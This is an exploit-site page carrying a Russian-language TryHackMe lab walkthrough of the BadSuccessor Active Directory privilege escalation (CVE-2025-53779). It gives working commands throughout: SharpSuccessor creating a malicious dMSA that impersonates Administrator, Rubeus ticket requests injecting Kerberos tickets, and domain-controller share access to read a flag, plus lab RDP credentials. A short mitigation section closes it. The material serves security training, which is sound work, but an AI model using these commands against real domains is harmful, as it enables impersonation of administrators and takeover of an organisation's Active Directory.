Sploitus

Exploit for Active-Directory-BadSuccessor

kitploit · 2026-08-31

Exploit Code

MARKDOWN244 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MUSA-XVI-ACTIVE-DIRECTORY-BADSUCCESSOR
# Active-Directory-BadSuccessor

# Обзор

В этой комнате мы исследуем технику повышения привилегий BadSuccessor — уязвимость, связанную со злоупотреблением делегированными управляемыми учётными записями служб (dMSA) в Active Directory. Атака позволяет пользователю с достаточным контролем над объектом dMSA выдать себя за другую учётную запись и потенциально получить привилегии администратора домена.

# Информация о комнате

**Комната:** https://tryhackme.com/room/adbadsuccessor

**Сложность:** Средняя

**Дата:** 05.06.2026

**Версия:** 1.0

**Цель:** Продемонстрировать, как делегированные управляемые учётные записи служб могут быть использованы для повышения привилегий и компрометации среды Active Directory.

**Роль:** Terry Byte (tbyte)

**Задача:** Оценить безопасность недавно развёрнутой среды Active Directory и определить, уязвима ли она для атаки BadSuccessor.

# Путь атаки

Атака состоит из двух основных этапов:

  1. Разведка.
  2. Повышение привилегий через злоупотребление dMSA



# Разведка

# Шаг 1 — Подключение к целевой машине

  * Подключитесь к предоставленной рабочей станции Windows с помощью RDP:



root@kitploit:~
    
    
    xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
    

  * После аутентификации откройте PowerShell.



# Шаг 2 — Переход в рабочую директорию

  * Перейдите в каталог Proof-of-Concept:

root@kitploit:~
        
        cd C:\PoC
        

  * Проверьте содержимое: `dir`


![navigate_directory](https://assets.kitploit.com/production/public/readmes/38182/c91c980680a76c44581f39f6d773f30a9fb0c63cdecdb835c8265b49c1a29da9.png)

# Шаг 3 — Получение скрипта перечисления

  * Загрузите скрипт PowerShell из репозитория BadSuccessor от Akamai:



root@kitploit:~
    
    
    https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
    

  * Создайте или отредактируйте скрипт с помощью Notepad:



notepad Get-BadSuccessorOUPermissions.ps1

  * Вставьте содержимое и сохраните файл.

![edit_script](https://assets.kitploit.com/production/public/readmes/38182/39cfa911294aa6bdfb5aa753ab3a6d3b04565e1407936e1b368a5d13d6193f35.png)

# Шаг 4 — Перечисление разрешений OU

  * Выполните скрипт:



root@kitploit:~
    
    
     .\Get-BadSuccessorOUPermissions.ps1
    

![enumerate_script](https://assets.kitploit.com/production/public/readmes/38182/0d1adf463b607debab86b69de8aba89a0a21abce7289b5cc957081ff03e4d3e7.png)

  * В выводе отображаются учётные записи, имеющие разрешения, которые потенциально могут быть использованы для злоупотребления делегированными управляемыми учётными записями служб.
  * Определите третью учётную запись, возвращённую скриптом.
  * Эта учётная запись будет использована на этапе повышения привилегий.



# Эксплуатация с помощью Windows

# Шаг 1 — Создание вредоносной dMSA

  * Используйте SharpSuccessor для создания делегированной управляемой учётной записи службы, которая выдает себя за учётную запись Администратора:

root@kitploit:~
        
        .\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
        

![malicious_dMSA](https://assets.kitploit.com/production/public/readmes/38182/e49a48628c86648ac3001ef24b41d7c90b1140f3c5a20a7b37959535063fc12a.png)



**Что происходит?**

  * Инструмент создаёт новый объект dMSA и настраивает его на наследование (succeed) от учётной записи Администратора.
  * Это закладывает основу для повышения привилегий.



# Шаг 2 — Запрос Kerberos TGT

  * Используйте Rubeus для получения делегированного билета предоставления билетов (TGT):

root@kitploit:~
        
        .\Rubeus.exe tgtdeleg /nowrap
        

![Kerberos TGT](https://assets.kitploit.com/production/public/readmes/38182/f8cdc199afdb88ef79960e53c8a93fc83e1272196899b59a5912746a15e7aacc.png)
  * Команда возвращает билет Kerberos в кодировке Base64.

  * Скопируйте полученный билет.




# Шаг 3 — Выдача себя за учётную запись dMSA

  * Используйте делегированный TGT для запроса билета от имени только что созданной учётной записи dMSA:



root@kitploit:~
    
    
     .\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
    

![dMSA_Account](https://assets.kitploit.com/production/public/readmes/38182/a492bfc7c556a0533b6afaaf085d47c0d15d982f6b30e12804ac9e1361d4782a.png)

**Результат:**

Новый билет Kerberos внедряется в память для учётной записи dMSA.

# Шаг 4 — Запрос билета службы от имени Администратора

  * Используйте билет dMSA для получения доступа к службам, работающим в контексте Администратора:

root@kitploit:~
        
        .\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
        

![Admin-ticket](https://assets.kitploit.com/production/public/readmes/38182/879b1d4d78d6c2074dd193d275a3906c8851779520353b70e939504331a08b8e.png)



**Результат:**

  * Билет службы CIFS загружается в память.
  * Этот билет предоставляет доступ к ресурсам, которые обычно требуют привилегий администратора домена.



# Шаг 5 — Доступ к рабочему столу Администратора

  * Проверьте повышенный доступ, просмотрев профиль Администратора на контроллере домена:



root@kitploit:~
    
    
     dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
    

![malicious_dMSA](https://assets.kitploit.com/production/public/readmes/38182/e49a48628c86648ac3001ef24b41d7c90b1140f3c5a20a7b37959535063fc12a.png)

  * Успешное отображение списка каталогов подтверждает доступ уровня администратора.



# Шаг 6 — Захват флага

  * Прочитайте флаг, хранящийся на рабочем столе Администратора:

root@kitploit:~
        
        Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
        

![Flag](https://assets.kitploit.com/production/public/readmes/38182/427e474b44de0bd5a0dd8c0daf7970c24637291bce1dc3c6a6c33156500ce65d.png)
  * Флаг успешно получен.




# Почему BadSuccessor важен

BadSuccessor демонстрирует, как делегированные управляемые учётные записи служб могут создавать пути повышения привилегий в средах Active Directory. Active Directory служит основой идентификации для многих организаций, и уязвимости, затрагивающие Kerberos и делегирование учётных записей, могут иметь серьёзные последствия.

Злоумышленник, имеющий достаточные разрешения на объект dMSA, может:

  * Выдавать себя за привилегированных пользователей
  * Получать повышенные билеты Kerberos
  * Получать доступ к конфиденциальным ресурсам
  * Повышать привилегии до администратора домена
  * Потенциально скомпрометировать весь лес Active Directory



# Рекомендации по смягчению

Для смягчения уязвимости BadSuccessor (CVE-2025-53779) организациям следует своевременно применять обновления безопасности от Microsoft, ограничивать и проверять разрешения dMSA, мониторить подозрительную активность Kerberos, аудировать отношения делегирования и соблюдать принцип минимальных привилегий. Регулярная проверка настроек делегирования Active Directory может помочь выявить и уменьшить потенциальные пути повышения привилегий.

# Основные выводы

Эта комната предоставила ценный практический опыт в следующих областях:

  * Повышение привилегий в Active Directory
  * Делегированные управляемые учётные записи служб (dMSA)
  * Злоупотребление аутентификацией Kerberos
  * Операции с билетами с помощью Rubeus
  * Эксплуатация с помощью SharpSuccessor
  * Техники проверки после эксплуатации